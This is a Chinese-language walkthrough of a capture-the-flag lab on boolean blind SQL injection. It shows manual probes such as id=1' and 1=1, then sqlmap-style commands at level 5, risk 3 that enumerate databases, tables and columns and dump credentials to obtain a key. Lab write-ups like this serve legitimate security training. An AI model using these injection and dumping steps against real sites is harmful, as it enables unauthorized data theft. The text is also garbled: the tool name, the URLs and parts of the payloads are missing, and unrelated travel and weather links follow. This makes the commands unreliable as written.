本次靶场操作步骤来源于 CSDN-吃肉唐僧
本次靶场使用系统和kali Linux系统
1.点击页面进去 , 发现浮动的通告进度条 , 找到SQL注入点
2.在地址栏中输入:/.php?id=1' and 1=1 , 这样页面就变成空白的了
3.输入/.php?id=1 and 1=1,内容显示 , 判断这个id的值类型是数字类型
4.然后开始判断数据库名字的长度 , /.php?id=1 and (())=1 , 内容空白 。一直试 , 试到长度为10
首先这里确定了这个数据库的长度(10)和类型(数字型) , 接下来就用bp抓网页内容
5.在kali终端新建一个后缀名为.txt的文件 , 然后打开bp , 将在网页上打开的通知网页的URL复制在bp上进行抓包 , 将下面的内容复制并保存在.txt文件里面
这里主要说一下就是 , 我们访问的是静态网页 , 所以每次抓到的都是一样的内容 , 如果说设置的浏览器(我这里的浏览器是)不一样 , 你可以对比一下我抓到的内容有没有什么不一样
【布尔盲注墨者学院——SQL注入漏洞测试】6.回到kali终端 , 输入查找数据库的命令: -r *.txt(新建的文本文件) --level 5 --risk 3 --dbs --dbms mysql --batch
文章插图
7.接着向下 , 找数据库里面的数据表: -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -- --batch
8.接着来查找表的字段: -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -- --dbms mysql --batch
9.最后看字段值:-r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1 , 字段2 , ....) --dump --dbms mysql --batch
最后的最后将密码解密一下 , 然后回到登录网页 , 就能看到Key , 然后提交
- 时间盲注 墨者学院SQL注入(手动注入+sqlmap+对于注入语句中的那个 ’
- 记在墨者学院业务逻辑漏洞靶场实战感受
- 超详细 墨者学院-入门级-浏览器信息伪造-小白必看
- 乌鲁木齐到布尔津
- 布尔津县天气预报
- 布尔津天气预报
- 努尔哈赤孙子爱新觉罗middo;班布尔善输了却输的精彩
- 伊斯坦布尔旅游
- 最接近外星人的地球人,2013年的温布尔登决赛:圆梦的安迪穆雷! 世界之最2013
- 伊斯坦布尔是哪个国家的